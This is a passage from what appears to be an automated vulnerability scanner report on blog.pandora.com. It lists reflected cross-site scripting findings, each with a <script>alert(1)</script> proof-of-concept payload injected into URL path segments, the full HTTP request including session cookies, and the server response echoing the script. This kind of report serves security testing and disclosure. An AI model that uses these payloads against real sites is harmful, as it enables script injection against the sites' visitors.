<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ was not found on this server.</p>
...[SNIP]...

1.315. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/colorado/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)</script>5b0b1194bdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ was not found on this server.</p>
...[SNIP]...

1.316. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/colorado/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)</script>be7f68e6c8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ was not found on this server.</p>
...[SNIP]...

1.317. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/colorado/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)</script>64acfed229b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ was not found on this server.</p>
...[SNIP]...

1.318. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/florida/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>0d232e15ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ was not found on this server.</p>
...[SNIP]...

1.319. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/florida/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)</script>144240895da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ was not found on this server.</p>
...[SNIP]...

1.320. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/florida/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)</script>2320b502118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ was not found on this server.</p>
...[SNIP]...

1.321. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/georgia/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)</script>5f361df41b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ was not found on this server.</p>
...[SNIP]...

1.322. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/georgia/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)</script>bc0dd599e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ was not found on this server.</p>
...[SNIP]...

1.323. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/georgia/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)</script>ae5fbffaaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ was not found on this server.</p>
...[SNIP]...

1.324. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/illinois/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)</script>11ad1856e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ was not found on this server.</p>
...[SNIP]...

1.325. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/illinois/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)</script>bbd3bee6ead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ was not found on this server.</p>
...[SNIP]...

1.326. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/illinois/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)</script>8413af64462 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ was not found on this server.</p>
...[SNIP]...

1.327. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)</script>35298219914 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html was not found on this server.</p>
...[SNIP]...

1.328. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)</script>0ea477101ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html was not found on this server.</p>
...[SNIP]...

1.329. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)</script>abd6920173d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html was not found on this server.</p>
...[SNIP]...

1.330. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)</script>09286fec01b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b was not found on this server.</p>
...[SNIP]...

1.331. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/indiana/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)</script>7ecc04df193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ was not found on this server.</p>
...[SNIP]...

1.332. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 2]  previous  next

Summary

